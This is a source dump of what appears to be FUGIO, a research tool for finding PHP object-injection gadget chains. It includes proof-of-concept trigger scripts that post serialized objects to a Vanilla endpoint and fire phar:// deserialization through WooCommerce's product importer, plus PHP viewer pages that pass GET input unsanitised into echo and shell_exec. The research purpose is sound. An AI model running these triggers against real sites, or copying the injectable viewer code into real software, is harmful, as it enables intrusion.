 9 |     print("[#] Usage: python [BASEURL] [USERID] [USERPW]")
10 |     exit()
11 | 
12 | def login(baseurl, adminid, adminpw):
13 |     URL = "{}{}".format(baseurl, "/entry/signin")
14 |     login_data = {
15 |             "CheckBoxes[]": "RememberMe",
16 |             "DeliveryMethod": "JSON",
17 |             "DeliveryType": "Veiw",
18 |             "Form/ClientHour": "2019-10-29 20:28",
19 |             "Form/Email": adminid,
20 |             "Form/hpt": "",
21 |             "Form/Password": adminpw,
22 |             "Form/Sign_In": "Sign In",
23 |             "Form/Target": "discussions",
24 |             "Form/TransientKey": "4UOZDPPC622K"
25 |             }
26 |     with requests.Session() as session:
27 |         r = session.post(URL, data = login_data)
28 |         if(r.text.find("FormSaved\":false") > -1):
29 |             print("[!] Login Failed!");
30 |             exit()
31 |         else:
32 |             return session
33 | 
34 | if __name__ != '__main__':
35 |     exit()
36 | 
37 | if(len(sys.argv) < 4):
38 |     printUsageAndExit()
39 | 
40 | BASEURL = sys.argv[1]
41 | ADMINID = sys.argv[2]
42 | ADMINPW = sys.argv[3]
43 | 
44 | # Get Token (TransientKey)
45 | session = login(BASEURL, ADMINID, ADMINPW)
46 | token_req = session.get("{}".format(BASEURL))
47 | soup = BeautifulSoup(token_req.text, features="html.parser")
48 | token = soup.find("input", {"type":"hidden", "id":"TransientKey"})['value']
49 | 
50 | TRIGGER_INPUT = 'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}'
51 | # Submit PAYLOAD
52 | PAYLOAD = {
53 |         "Messages": "1", # "a:{}".format(sys.argv[2]),
54 |         "Response": "a:{}".format(TRIGGER_INPUT),
55 |         "TransientKey": token
56 |         }
57 | 
58 | poc_req = session.post("{}{}".format(BASEURL, "/dashboard/utility/updateresponse"),
59 |                             data = PAYLOAD)
60 | # print(poc_req.text)
61 | 


--------------------------------------------------------------------------------
/Trigger/woocommerce_poc.py:
--------------------------------------------------------------------------------
 1 | # Woocommerce 3.4.5 on Wordpess 5.4 - PoC
 2 | import requests
 3 | import sys
 4 | from bs4 import BeautifulSoup
 5 | import base64
 6 | import random
 7 | import re
 8 | 
 9 | def printUsageAndExit():
10 |     print("[#] Usage: python [BASEURL] [SHOP_MANAGER_ID] [SHOP_MANAGER_PW] [UPLOADED_PHAR_PATH]")
11 |     exit()
12 | 
13 | def login(baseurl, shop_manager_id, shop_manager_pw):
14 |     URL = "{}{}".format(baseurl, "/wp-login.php")
15 |     login_data = {
16 |             "log": shop_manager_id,
17 |             "pwd": shop_manager_pw,
18 |             "wp-submit": "Log In",
19 |             "redirect_to": "{}{}".format(baseurl, "/wp-admin/"),
20 |             "testcookie": "1"
21 |             }
22 |     header = {
23 | 	        "Cookie": "wordpress_test_cookie=WP Cookie check",
24 |             }
25 | 	
26 |     
27 |     with requests.Session() as session:
28 |         r = session.post(URL, data = login_data, headers = header)
29 |         if(r.text.find("Lost your password?") > -1):
30 |             print("[!] Login Failed!");
31 |             exit()
32 |         else:
33 |             return session
34 | 
35 | def importProduct(baseurl, manager_session, phar_path):
36 |     import_data = "post_type=product&page=product_importer&step=import&file=phar://{}&delimiter=,".format(phar_path)
37 |     import_url = "{}/wp-admin/edit.php?{}".format(baseurl, import_data)
38 |     manager_session.get(import_url)
39 | 
40 | if __name__ != '__main__':
41 |     exit()
42 | 
43 | if(len(sys.argv) < 5):
44 |     printUsageAndExit()
45 | 
46 | BASEURL = sys.argv[1]
47 | SHOP_MAGNER_ID = sys.argv[2]
48 | SHOP_MAGNER_PW = sys.argv[3]
49 | UPLOADED_PHAR_PATH = sys.argv[4]
50 | 
51 | manager_session = login(BASEURL, SHOP_MAGNER_ID, SHOP_MAGNER_PW)
52 | print("[#] Phar bug trigger..")
53 | importProduct(BASEURL, manager_session, UPLOADED_PHAR_PATH)
54 | 


--------------------------------------------------------------------------------
/Trigger/wp_run.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import os
 4 | import sys
 5 | 
 6 | SITE = 'http://127.0.0.1'
 7 | PHAR = '/app/phar_validator/dummy_class_r353t.png'
 8 | 
 9 | if len(sys.argv) != 2:
10 |   print ('Usage: {} [app_path]'.format(sys.argv[0]))
11 |   sys.exit()
12 | 
13 | APP_PATH = sys.argv[1][:-1] if sys.argv[1].endswith('/') else sys.argv[1]
14 | APP_NAME = os.path.basename(APP_PATH)
15 | 
16 | if APP_NAME == "wordpress-WooCommerce-3.4.0":
17 |     script = 'woocommerce_poc.py'
18 |     args = ['admin', 'asdf1234', PHAR]
19 | elif "wordpress" in APP_NAME:
20 |     script = 'wordpress_poc.py'
21 |     args = ['admin', 'asdf1234', PHAR]
22 | 
23 | cmd = 'python3 {} {}/{} {}'.format(script, SITE, APP_NAME, ' '.join(args))
24 | print(cmd)
25 | os.system(cmd)
26 | 


--------------------------------------------------------------------------------
/Utils/__init__.py:
--------------------------------------------------------------------------------
1 | from .Bootstrap import Bootstrap
2 | 


--------------------------------------------------------------------------------
/Utils/arg.py:
--------------------------------------------------------------------------------
 1 | import argparse
 2 | from multiprocessing import cpu_count
 3 | 
 4 | def create_parser():
 5 |     parser = argparse.ArgumentParser()
 6 |     parser.add_argument('target')
 7 |     parser.add_argument('--doc_root', default='/var/www/html')
 8 |     parser.add_argument('--all', action="store_true")
 9 |     # parser.add_argument('-d', '--debug', action="store_true")
10 |     parser.add_argument('--rabbitmq_ip', default='localhost')
11 |     parser.add_argument('--php_ver', default=5, choices=[5, 7], type=int)
12 |     parser.add_argument('--hook_extension', default="uopz", choices=["uopz", "runkit"])
13 |     parser.add_argument('--cpus', default=cpu_count(), type=int)
14 |     return parser
15 | 
16 | # def parse(args):
17 | #     parser = create_parser()
18 | #     return parser.parse_args(args)
19 | 
20 | def parse():
21 |     parser = create_parser()
22 |     return parser.parse_args()
23 | 


--------------------------------------------------------------------------------
/Utils/makeHTTP.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | import requests
 3 | import random
 4 | import copy 
 5 | 
 6 | class HTTPGen():
 7 |     def __init__(self, callback_data, overwrite_method, overwrite_key, encode='None'):
 8 |         
 9 |         log_data = copy.deepcopy(callback_data)
10 |         self._url = "http://{}{}".format(
11 |                 log_data['SERVER']['HTTP_HOST'],
12 |                 log_data['SERVER']['SCRIPT_NAME'])
13 |         self._method = log_data['SERVER']['REQUEST_METHOD']
14 |         headers = dict()
15 |         for server_key, server_value in log_data['SERVER'].items():
16 |             if(server_key == "HTTP_COOKIE"):
17 |                 continue
18 |             if(server_key[:5] == "HTTP_"):
19 |                 headers[server_key[5:]] = server_value
20 | 
21 |         rand_num = str(random.randint(1000000000, 9999999999))
22 |         headers['X-Requested-With'] = "{}{}{}{}{}".format(rand_num,
23 |                 overwrite_method, rand_num,
24 |                 overwrite_key, rand_num,
25 |                 encode,
26 |                 rand_num)
27 | 
28 |         cookie_jar = dict()
29 |         if(overwrite_method == "COOKIE"):
30 |             for cookie_key, cookie_value in log_data['COOKIE'].items():
31 |                 if(cookie_key == overwrite_key):
32 |                     if(encode == 'base64'):
33 |                         cookie_jar[cookie_key] = "TzoxNzoiZHVtbXlfY2xhc3NfcjM1M3QiOjE6e3M6MTI6InVzZWRfbWV0aG9kcyI7YTowOnt9fQ=="
34 |                     else:
35 |                         cookie_jar[cookie_key] = 'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}'
36 |                 else:
37 |                     cookie_jar[cookie_key] = cookie_value
38 |         else:
39 |             if isinstance(log_data['COOKIE'], dict):
40 |                 for cookie_key, cookie_value in log_data['COOKIE'].items():
41 |                     cookie_jar[cookie_key] = cookie_value
42 | 
43 |             if(encode == 'base64'):
44 |                 log_data[overwrite_method][overwrite_key] = "TzoxNzoiZHVtbXlfY2xhc3NfcjM1M3QiOjE6e3M6MTI6InVzZWRfbWV0aG9kcyI7YTowOnt9fQ=="
45 |             else:
46 |                 log_data[overwrite_method][overwrite_key] = 'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}'
47 | 
48 |         if(self._method == "GET"):
49 |             r = requests.get(url=self._url, params = log_data['GET'],
50 |                     headers = headers, cookies = cookie_jar,
51 |                     allow_redirects = False)
52 |         elif(self._method == "POST"):
53 |             r = requests.post(url=self._url, params = log_data['GET'],
54 |                     data = log_data['POST'],
55 |                     headers = headers, cookies = cookie_jar,
56 |                     allow_redirects = False)
57 | 
58 | 


--------------------------------------------------------------------------------
/chain_analyzer/chain_list.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | $dir_path = $_GET['dir_path'];
  3 | $sink = $_GET['sink'];
  4 | $proc_id = $_GET['proc_id'];
  5 | 
  6 | echo "<h1> $dir_path </h1>";
  7 | 
  8 | $all_chain_list = array();
  9 | $uniq_chain_list = array();
 10 | $total_chain_counts = 0;
 11 | foreach(glob("{$dir_path}/{$proc_id}_*.chain") as $file_path) {
 12 |     $total_chain_counts += 1;
 13 |     $file_name = basename($file_path);
 14 | 
 15 |     $data = file_get_contents($file_path);
 16 |     $gadget_list = json_decode($data, true)['chain'];
 17 |     if(!is_array($gadget_list) || count($gadget_list) == 0) {
 18 |         continue;
 19 |     }
 20 |     $magic_method = $gadget_list[0]['method'];
 21 |     $idx = explode('_', $file_name)[1];
 22 | 
 23 |     $chain = "";
 24 |     foreach($gadget_list as $gadget) {
 25 |         if ($gadget == end($gadget_list)) {
 26 |             $chain .= $gadget['real_class'] . "::" . $gadget['sink'];
 27 |         }
 28 |         else {
 29 |             $chain .= $gadget['real_class'] . "::" . $gadget['method'] . " - ";
 30 |         }
 31 |     }
 32 | 
 33 |     if(!array_key_exists($magic_method, $all_chain_list)) {
 34 |         $all_chain_list[$magic_method] = array();
 35 |     }
 36 | 
 37 |     $all_chain_list[$magic_method][] = array(
 38 |         'PATH'=>$file_path,
 39 |         'NAME'=>$file_name,
 40 |         'IDX'=>$idx,
 41 |         'LENGTH'=>count($gadget_list),
 42 |         'MAGIC_METHOD'=>$magic_method,
 43 |         'CHAIN'=>$chain
 44 |     );
 45 | 
 46 |     if (!in_array($chain, $uniq_chain_list)) {
 47 |         $uniq_chain_list[] = $chain;
 48 |     }
 49 | }
 50 | 
 51 | echo "<h3> $sink - $proc_id ($total_chain_counts/" . count($uniq_chain_list) . ") </h3>";
 52 | echo "<ul>";
 53 | foreach($all_chain_list as $magic_method=>$chain_list) {
 54 |     echo '<li><a href="#' . $magic_method . '">';
 55 |     echo "$magic_method</a>";
 56 |     echo " (" . count($chain_list) . ")";
 57 |     echo "</li>";
 58 | }
 59 | echo "</ul>";
 60 | echo '<hr align="left" width="80%">';
 61 | 
 62 | echo "<ul>";
 63 | foreach($all_chain_list as $magic_method=>$chain_list) {
 64 |     echo '<li id="' . $magic_method . '">';
 65 |     echo '<b>' . $magic_method;
 66 |     echo " (". count($chain_list) . ")";
 67 |     echo "</b></li>";
 68 |     echo "<ul>";
 69 | 
 70 |     $key1 = array_map(function($element) {
 71 |         return $element['IDX'];
 72 |     }, $chain_list);
 73 |     $key2 = array_map(function($element) {
 74 |         return $element['LENGTH'];
 75 |     }, $chain_list);
 76 |     $key3 = array_map(function($element) {
 77 |         return $element['CHAIN'];
 78 |     }, $chain_list);
 79 |     array_multisort($key2, SORT_NUMERIC, SORT_ASC,
 80 |                     $key3, SORT_ASC,
 81 |                     $key1, SORT_NUMERIC, SORT_ASC, $chain_list);
 82 | 
 83 |     $old_chain = "";
 84 |     foreach($chain_list as $chain) {
 85 |         $file_name = $chain['NAME'];
 86 |         $file_path = $chain['PATH'];
 87 |         $chain_len = $chain['LENGTH'];
 88 |         $magic_method = $chain['MAGIC_METHOD'];
 89 |         $new_chain = $chain['CHAIN'];
 90 | 
 91 |         if ($old_chain != $new_chain) {
 92 |             if ($chain != $chain_list[0]) {
 93 |                 echo "</ol>";
 94 |             }
 95 |             echo "<li>";
 96 |             // foreach($new_chain as $c) {
 97 |             //     echo "$c";
 98 |             //     if ($c != end($new_chain)) {
 99 |             //         echo " - ";
100 |             //     }
101 |             // }
102 |             echo $new_chain;
103 |             echo "</li>";
104 |             echo "<ol>";
105 |             $old_chain = $new_chain;
106 |         }
107 | 
108 |         echo "<li>";
109 |         echo "<a href='chain_analyzer.php?file_path=$file_path'>";
110 |         echo "$file_name" . "</a> ";
111 |         echo "(Lenth: " . $chain_len . ", ";
112 |         echo "Magic method: " . $magic_method . ")";
113 |         echo "</li>";
114 |     }
115 |     echo "</ol>";
116 |     echo "</ul>";
117 |     echo "<br>";
118 | }
119 | echo "</ul>";


--------------------------------------------------------------------------------
/chain_analyzer/display_code.php:
--------------------------------------------------------------------------------
1 | <?php
2 | ini_set("highlight.comment", "#C0C0C0");
3 | ini_set("highlight.string", "#000000");
4 | 
5 | $file_path = $_GET['file_path'];
6 | echo "<h1>$file_path</h1>";
7 | $text = highlight_file($file_path);
8 | ?>
9 | 


--------------------------------------------------------------------------------
/chain_analyzer/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | @set_time_limit(0);
 4 | $pwd = dirname(__FILE__);
 5 | $ROOTDIR = realpath($pwd . "/../Files/fuzzing");
 6 | // $ROOTDIR = realpath($pwd . "/../test");
 7 | 
 8 | echo "<h1>Directory List</h1></hr>";
 9 | 
10 | function r_scandir($root_dir, &$results = array()) {
11 |     foreach(glob("$root_dir/*", GLOB_ONLYDIR) as $dir) {
12 |         r_scandir($dir, $results);
13 |         if (in_array('put-body.php', scandir($dir)) ||
14 |             in_array('PUT_body.php', scandir($dir))) {
15 |             $results[] = $dir;
16 |         }
17 |     }
18 |     return $results;
19 | }
20 | 
21 | $dir_info = array();
22 | foreach(r_scandir($ROOTDIR) as $dir_path) {
23 |     $dir_name = basename($dir_path);
24 |     $chain_cnt = shell_exec("find $dir_path -name \"proc*.chain\" | wc -l");
25 | 
26 |     $parents = array_diff(explode('/', $dir_path, -1), explode('/', "$ROOTDIR/", -1));
27 |     $parents[] = '.';
28 | 
29 |     $cur = &$dir_info;
30 |     foreach ($parents as $parent) {
31 |         if (!array_key_exists($parent, $cur)) {
32 |             $cur[$parent] = array();
33 |         }
34 |         $cur = &$cur[$parent];
35 |     }
36 |     $cur[] = array('DIR_PATH'=>$dir_path,
37 |                    'DIR_NAME'=>$dir_name,
38 |                    'CHAIN_COUNT'=>$chain_cnt);
39 | }
40 | 
41 | function traverse_dir_info($parent) {
42 |     foreach($parent as $dir_name=>$dir_list) {
43 |         if ($dir_name == '.') {
44 |             echo "<ul>";
45 |             foreach($dir_list as $dir) {
46 |                 $name = $dir['DIR_NAME'];
47 |                 $path = $dir['DIR_PATH'];
48 |                 $chain_count = $dir['CHAIN_COUNT'];
49 |                 echo "<li>";
50 |                 echo "<a href='sink_list.php?dir_path=$path'>";
51 |                 echo "$name</a> ";
52 |                 echo " - # of chains: $chain_count";
53 |                 echo "</li>";
54 |             }
55 |             echo "</ul>";
56 |         }
57 |         else {
58 |             echo "<ul>";
59 |             echo "<li>$dir_name</li>";
60 |             traverse_dir_info($dir_list);
61 |             echo "</ul>";
62 |         }
63 |     }
64 | }
65 | traverse_dir_info($dir_info);


--------------------------------------------------------------------------------
/chain_analyzer/sink_list.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $dir_path = $_GET['dir_path'];
 3 | 
 4 | echo "<h1> $dir_path </h1>";
 5 | 
 6 | $sink_list = array();
 7 | $total_chain_counts = 0;
 8 | $total_proc = 0;
 9 | 
10 | $proc_sink = array();
11 | foreach(glob("$dir_path/proc*.chain") as $file_path) {
12 |     $total_chain_counts += 1;
13 |     $file_name = basename($file_path);
14 |     $chain_info = explode('_', $file_name);
15 | 
16 |     $proc_id = $chain_info[0];
17 |     $chain_idx = $chain_info[1];
18 |     $chain_length = $chain_info[2];
19 | 
20 |     if (!array_key_exists($proc_id, $proc_sink)) {
21 |         $data = file_get_contents($file_path);
22 |         $chain_list = json_decode($data, true)['chain'];
23 |         if(!is_array($chain_list) || count($chain_list) == 0) {
24 |             continue;
25 |         }
26 |         $sink = end($chain_list)['sink'];
27 |         if (end($chain_list)['class'] == end($chain_list)['real_class']) {
28 |             $sink_method = end($chain_list)['class'];
29 |             $sink_method .= "::";
30 |             $sink_method .= end($chain_list)['method'];
31 |         }
32 |         else {
33 |             $sink_method = end($chain_list)['class'];
34 |             $sink_method .= "(" . end($chain_list)['real_class']. ")::";
35 |             $sink_method .= end($chain_list)['method'];
36 |         }
37 |         $proc_sink[$proc_id] = $sink;
38 |     }
39 |     $sink = $proc_sink[$proc_id];
40 | 
41 |     if (!array_key_exists($sink, $sink_list)) {
42 |         $sink_list[$sink] = array();
43 |     }
44 |     if (!array_key_exists($proc_id, $sink_list[$sink])) {
45 |         $sink_list[$sink][$proc_id] = array();
46 |         $total_proc += 1;
47 |     }
48 |     $sink_list[$sink][$proc_id][] = array('IDX'=>$chain_idx,
49 |                                           'LEN'=>$chain_length,
50 |                                           'METHOD'=>$sink_method);
51 | }
52 | 
53 | echo '<ul style="list-style-type:square;"><li><b>Overview</b></li>';
54 | echo '<ul style="list-style-type:disc;">';
55 | echo "<li><b># of covered sinks: " . count($sink_list) . "</b></li>";
56 | echo "<li><b># of unique sinks: $total_proc</b></li>";
57 | echo "<li><b># of generated chains: $total_chain_counts</b></li>";
58 | echo "</ul><br>";
59 | 
60 | echo "<li><b>Sink list</b></li><ul>";
61 | $sink_chain_cnt = array();
62 | foreach($sink_list as $sink=>$proc_list) {
63 |     $total_cnt = 0;
64 |     foreach($proc_list as $proc=>$proc_info) {
65 |         $total_cnt += count($proc_info) ;
66 |     }
67 |     $sink_chain_cnt[$sink] = $total_cnt;
68 |     echo '<li><a href="#' . $sink . '">';
69 |     echo "$sink</a>";
70 |     echo " (" . count($sink_list[$sink]) . ", " . $total_cnt . ")";
71 |     echo "</li>";
72 | }
73 | echo "</ul></ul>";
74 | echo '<hr align="left" width="80%">';
75 | 
76 | echo "<ul>";
77 | foreach($sink_list as $sink=>$proc_list) {
78 |     echo '<li id="' . $sink . '">';
79 |     echo '<b>' . $sink;
80 |     echo " (". count($sink_list[$sink]) . ", " . $sink_chain_cnt[$sink] . ")";
81 |     echo "</b></li>";
82 | 
83 |     echo "<ol>";
84 |     $key = array_map(function($key) {
85 |         return substr($key, 4);
86 |     }, array_keys($proc_list));
87 |     array_multisort($key, SORT_NUMERIC, SORT_ASC, $proc_list);
88 | 
89 |     foreach($proc_list as $proc=>$proc_info) {
90 |         echo "<li><a href='chain_list.php?dir_path=$dir_path&sink=$sink&proc_id=$proc'>";
91 |         echo "$proc</a>";
92 |         echo " (" . count($proc_info) . ")";
93 |         echo " - " . $proc_info[0]['METHOD'] . "</li>";
94 |     }
95 |     echo "</ol><br>";
96 | }
97 | echo "</ul>";


--------------------------------------------------------------------------------
/config.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import os
 4 | import sys
 5 | 
 6 | if len(sys.argv) != 2:
 7 |     print("[Usage] {} [org/ccs/phpggc]".format(sys.argv[0]))
 8 |     sys.exit()
 9 | 
10 | if sys.argv[1] == "org":
11 |     os.system("cp Analyzer/chain.py.org Analyzer/chain.py")
12 |     os.system("cp Proxy/proxy.py.org Proxy/proxy.py")
13 | 
14 | elif sys.argv[1] == "ccs":
15 |     os.system("cp Analyzer/chain.py.ccs Analyzer/chain.py")
16 | 
17 | elif sys.argv[1] == "phpggc":
18 |     os.system("cp Analyzer/chain.py.phpggc Analyzer/chain.py")
19 |     os.system("cp Proxy/proxy.py.phpggc Proxy/proxy.py")
20 | 
21 | else:
22 |     print("[Usage] {} [org/ccs/phpggc]".format(sys.argv[0]))
23 | 


--------------------------------------------------------------------------------
/htaccess.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import os
 4 | import sys
 5 | 
 6 | if len(sys.argv) != 2:
 7 |     print("[Usage] {} [on/off]".format(sys.argv[0]))
 8 |     sys.exit()
 9 | 
10 | if sys.argv[1] == "on":
11 |     os.system('echo "php_value auto_prepend_file /FUGIO/Files/hook_sensitive_functions.php" > /app/.htaccess')
12 | elif sys.argv[1] == "off":
13 |     os.system('rm /app/.htaccess')
14 | else:
15 |     print("[Usage] {} [on/off]".format(sys.argv[1]))
16 | 


--------------------------------------------------------------------------------
/install_54.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | pip3 install -r requirements.txt
 3 | 
 4 | cd Lib/rabbitmq_php
 5 | composer install
 6 | cd ../..
 7 | 
 8 | cd Lib/PHP-Parser
 9 | composer install
10 | cd ../..
11 | 
12 | cd Lib/evalhook
13 | phpize
14 | ./configure
15 | make && make install
16 | cd ../..
17 | 
18 | cd Lib/runkit
19 | phpize
20 | ./configure
21 | make && make install
22 | cd ../..
23 | 
24 | cd Lib/uopz
25 | phpize
26 | ./configure
27 | make && make install
28 | cd ../..
29 | 
30 | cd Lib/pcntl54
31 | phpize
32 | ./configure
33 | make && make install
34 | cd ../..
35 | 
36 | cd Lib/php-jsond
37 | phpize
38 | ./configure
39 | make && make install
40 | cd ../..
41 | 
42 | grep -qF -- "extension=evalhook.so" /usr/local/lib/php.ini || echo "extension=evalhook.so" >> /usr/local/lib/php.ini
43 | grep -qF -- "extension=uopz.so" /usr/local/lib/php.ini || echo "extension=uopz.so" >> /usr/local/lib/php.ini
44 | grep -qF -- "extension=pcntl.so" /usr/local/lib/php.ini || echo "extension=pcntl.so" >> /usr/local/lib/php.ini
45 | grep -qF -- "extension=jsond.so" /usr/local/lib/php.ini || echo "extension=jsond.so" >> /usr/local/lib/php.ini
46 | grep -qF -- "; extension=runkit.so" /usr/local/lib/php.ini || echo "; extension=runkit.so" >> /usr/local/lib/php.ini
47 | grep -qF -- "; runkit.internal_override=1" /usr/local/lib/php.ini || echo "; runkit.internal_override=1" >> /usr/local/lib/php.ini
48 | sed -i "s/;phar.readonly = On/phar.readonly = Off/g" /usr/local/lib/php.ini
49 | 


--------------------------------------------------------------------------------
/install_56.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | pip3 install -r requirements.txt
 3 | 
 4 | cd Lib/rabbitmq_php
 5 | composer install
 6 | cd ../..
 7 | 
 8 | cd Lib/PHP-Parser
 9 | composer install
10 | cd ../..
11 | 
12 | cd Lib/evalhook
13 | phpize
14 | ./configure
15 | make && make install
16 | cd ../..
17 | 
18 | cd Lib/uopz
19 | phpize
20 | ./configure
21 | make && make install
22 | cd ../..
23 | 
24 | cd Lib/pcntl56
25 | phpize
26 | ./configure
27 | make && make install
28 | cd ../..
29 | 
30 | grep -qF -- "extension=evalhook.so" /etc/php/5.6/apache2/php.ini || echo "extension=evalhook.so" >> /etc/php/5.6/apache2/php.ini
31 | grep -qF -- "extension=uopz.so" /etc/php/5.6/apache2/php.ini || echo "extension=uopz.so" >> /etc/php/5.6/apache2/php.ini
32 | grep -qF -- "extension=uopz.so" /etc/php/5.6/cli/php.ini || echo "extension=uopz.so" >> /etc/php/5.6/cli/php.ini
33 | grep -qF -- "extension=pcntl.so" /etc/php/5.6/apache2/php.ini || echo "extension=pcntl.so" >> /etc/php/5.6/apache2/php.ini
34 | sed -i "s/^disable_functions/; disable_functions/g" /etc/php/5.6/apache2/php.ini
35 | sed -i "s/;phar.readonly = On/phar.readonly = Off/g" /etc/php/5.6/cli/php.ini
36 | 


--------------------------------------------------------------------------------
/install_72.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | pip3 install -r requirements.txt
 3 | 
 4 | cd Lib/rabbitmq_php7
 5 | composer install
 6 | cd ../..
 7 | 
 8 | cd Lib/PHP-Parser7
 9 | composer install
10 | cd ../..
11 | 
12 | cd Lib/evalhook7
13 | phpize
14 | ./configure
15 | make && make install
16 | cd ../..
17 | 
18 | cd Lib/uopz7
19 | phpize
20 | ./configure
21 | make && make install
22 | cd ../..
23 | 
24 | cd Lib/pcntl72
25 | phpize
26 | ./configure
27 | make && make install
28 | cd ../..
29 | 
30 | grep -qF -- "extension=evalhook.so" /etc/php/7.2/apache2/php.ini || echo "extension=evalhook.so" >> /etc/php/7.2/apache2/php.ini
31 | grep -qF -- "extension=uopz.so" /etc/php/7.2/apache2/php.ini || echo "extension=uopz.so" >> /etc/php/7.2/apache2/php.ini
32 | grep -qF -- "extension=uopz.so" /etc/php/7.2/cli/php.ini || echo "extension=uopz.so" >> /etc/php/7.2/cli/php.ini
33 | grep -qF -- "extension=pcntl.so" /etc/php/7.2/apache2/php.ini || echo "extension=pcntl.so" >> /etc/php/7.2/apache2/php.ini
34 | sed -i "s/^disable_functions/; disable_functions/g" /etc/php/7.2/apache2/php.ini
35 | sed -i "s/;phar.readonly = On/phar.readonly = Off/g" /etc/php/7.2/cli/php.ini
36 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
 1 | beautifulsoup4==4.8.1
 2 | boto==2.49.0
 3 | bs4==0.0.1
 4 | certifi==2019.9.11
 5 | chardet==3.0.4
 6 | cycler==0.10.0
 7 | idna==2.8
 8 | kiwisolver==1.2.0
 9 | matplotlib==3.2.1
10 | numpy==1.18.5
11 | pika==1.1.0
12 | pyparsing==2.4.7
13 | python-dateutil==2.8.1
14 | requests==2.22.0
15 | six==1.14.0
16 | soupsieve==1.9.5
17 | urllib3==1.25.6
18 | 


--------------------------------------------------------------------------------
/run.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3 -B
 2 | import sys
 3 | import os
 4 | 
 5 | from Utils import arg, Bootstrap
 6 | from Detector.DetectorManager import *
 7 | from Analyzer.analyzer import *
 8 | 
 9 | args = arg.parse()
10 | target = args.target
11 | DOC_ROOT = args.doc_root
12 | rabbitmq_ip = args.rabbitmq_ip
13 | hook_extension = args.hook_extension
14 | php_ver = args.php_ver
15 | all_files = args.all
16 | cpus = args.cpus
17 | 
18 | # Get Class List
19 | analyzer = Analyzer(target, rabbitmq_ip)
20 | class_list = analyzer.class_list
21 | 
22 | # Make hooking file
23 | B = Bootstrap()
24 | validator_md5 = B.makePharValidator(DOC_ROOT)
25 | B.makeHookFile(rabbitmq_ip, DOC_ROOT, validator_md5,
26 |                hook_extension, php_ver, class_list)
27 | 
28 | # Start Detection
29 | DM = DetectorManager(target, rabbitmq_ip, php_ver, all_files, cpus)
30 | DM.startManager(1, rabbitmq_ip) # Thread count
31 | 
32 | # Usage
33 | # Need to link Detection stage and chain generation stage
34 | exit()
35 | # ------------
36 | 


--------------------------------------------------------------------------------
/run_FUGIO_54.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | BASEDIR=$(dirname "$0")
 4 | HOSTIP=172.17.0.1
 5 | 
 6 | sed -ri -e "s/^extension=runkit.so/; extension=runkit.so/" /usr/local/lib/php.ini
 7 | sed -ri -e "s/^runkit.internal_override=1/; runkit.internal_override=1/" /usr/local/lib/php.ini
 8 | sed -ri -e "s/^zend_extension=\/usr\/local\/lib\/php\/extensions\/no-debug-non-zts-20100525\/ioncube_loader_lin_5.4.so/; zend_extension=\/usr\/local\/lib\/php\/extensions\/no-debug-non-zts-20100525\/ioncube_loader_lin_5.4.so/" /usr/local/lib/php.ini
 9 | sed -ri -e "s/^; extension=uopz.so/extension=uopz.so/" /usr/local/lib/php.ini
10 | apache2ctl restart
11 | 
12 | $BASEDIR/run.py --rabbitmq_ip=$HOSTIP $@
13 | 


--------------------------------------------------------------------------------
/run_FUGIO_54_all.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | BASEDIR=$(dirname "$0")
 4 | HOSTIP=172.17.0.1
 5 | 
 6 | sed -ri -e "s/^extension=runkit.so/; extension=runkit.so/" /usr/local/lib/php.ini
 7 | sed -ri -e "s/^runkit.internal_override=1/; runkit.internal_override=1/" /usr/local/lib/php.ini
 8 | sed -ri -e "s/^zend_extension=\/usr\/local\/lib\/php\/extensions\/no-debug-non-zts-20100525\/ioncube_loader_lin_5.4.so/; zend_extension=\/usr\/local\/lib\/php\/extensions\/no-debug-non-zts-20100525\/ioncube_loader_lin_5.4.so/" /usr/local/lib/php.ini
 9 | sed -ri -e "s/^; extension=uopz.so/extension=uopz.so/" /usr/local/lib/php.ini
10 | apache2ctl restart
11 | 
12 | $BASEDIR/run.py --rabbitmq_ip=$HOSTIP --all $@
13 | 


--------------------------------------------------------------------------------
/run_FUGIO_56.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | BASEDIR=$(dirname "$0")
4 | HOSTIP=172.17.0.1
5 | 
6 | $BASEDIR/run.py --rabbitmq_ip=$HOSTIP $@
7 | 


--------------------------------------------------------------------------------
/run_FUGIO_72.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | BASEDIR=$(dirname "$0")
4 | HOSTIP=172.17.0.1
5 | 
6 | $BASEDIR/run.py --rabbitmq_ip=$HOSTIP --php_ver=7 $@
7 | 


--------------------------------------------------------------------------------
/run_FUGIO_cubecart.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | BASEDIR=$(dirname "$0")
 4 | HOSTIP=172.17.0.1
 5 | 
 6 | sed -ri -e "s/^; extension=runkit.so/extension=runkit.so/" /usr/local/lib/php.ini
 7 | sed -ri -e "s/^; runkit.internal_override=1/runkit.internal_override=1/" /usr/local/lib/php.ini
 8 | sed -ri -e "s/^; zend_extension=\/usr\/local\/lib\/php\/extensions\/no-debug-non-zts-20100525\/ioncube_loader_lin_5.4.so/zend_extension=\/usr\/local\/lib\/php\/extensions\/no-debug-non-zts-20100525\/ioncube_loader_lin_5.4.so/" /usr/local/lib/php.ini
 9 | sed -ri -e "s/^extension=uopz.so/; extension=uopz.so/" /usr/local/lib/php.ini
10 | apache2ctl restart
11 | 
12 | $BASEDIR/run.py --rabbitmq_ip=$HOSTIP --hook_extension=runkit $@
